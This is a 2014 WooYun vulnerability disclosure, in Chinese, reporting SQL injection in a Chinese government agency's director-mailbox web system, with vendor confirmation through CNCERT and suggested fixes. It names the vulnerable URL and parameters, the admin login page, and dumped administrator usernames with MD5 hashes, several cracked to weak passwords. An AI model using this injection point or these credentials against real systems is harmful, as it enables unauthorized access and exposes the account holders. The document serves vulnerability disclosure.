当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051014

漏洞标题:国家中医药管理局局长信息系统SQL注入泄露管理员账户信息

相关厂商:cncert国家互联网应急中心

漏洞作者: HackBraid

提交时间:2014-02-24 14:06

修复时间:2014-04-10 14:07

公开时间:2014-04-10 14:07

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-24: 细节已通知厂商并且等待厂商处理中
2014-03-01: 厂商已经确认,细节仅向厂商公开
2014-03-11: 细节向核心白帽子及相关领域专家公开
2014-03-21: 细节向普通白帽子公开
2014-03-31: 细节向实习白帽子公开
2014-04-10: 细节向公众公开

简要描述:

SQL注入泄露管理员账户信息并登陆信箱系统

详细说明:

站点:
http://www.satcm.gov.cn:82/ 国家中医药管理局局长信箱系统
注入点:
参数classID=1和Nclassid=2均未做防注入处理
http://www.satcm.gov.cn:82/addmail.asp?classID=1&Nclassid=2
网络在线信箱系统:
http://www.satcm.gov.cn:1982/admin/manage.asp

漏洞证明:

1.泄露信息表:

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[2 tables]
+---------+
| admin |
| article |
+---------+


2.admin泄露不少管理账户:

Table: admin
[8 entries]
+----+------------+---------------------------------------------+
| id | username | password |
+----+------------+---------------------------------------------+
| 1 | redwolf557 | c62d929e7b7e7b6165923a5dfc60cb56 (q1w2e3r4) |
| 2 | liheng | 6e082f91d878ff6770539a897e3e743c |
| 3 | jijian | 202cb962ac59075b964b07152d234b70 (123) |
| 4 | bgs | e10adc3949ba59abbe56e057f20f883e (123456) |
| 5 | rsjys | e10adc3949ba59abbe56e057f20f883e (123456) |
| 6 | ghcws | e10adc3949ba59abbe56e057f20f883e (123456) |
| 7 | fjs | e10adc3949ba59abbe56e057f20f883e (123456) |
| 8 | yzs | e10adc3949ba59abbe56e057f20f883e (123456) |
+----+------------+---------------------------------------------+


3.密码过于简单:
以系统管理员身份登陆

y.jpg


y1.jpg


y3.jpg


y4.jpg


4.看到还有数据库备份的功能,政府网站就不深入了!

修复方案:

消除注入点
密码加强
目录权限

版权声明:转载请注明来源 HackBraid@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-03-01 11:22

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT上报国家某信息安全协调机构处置。

最新状态:

暂无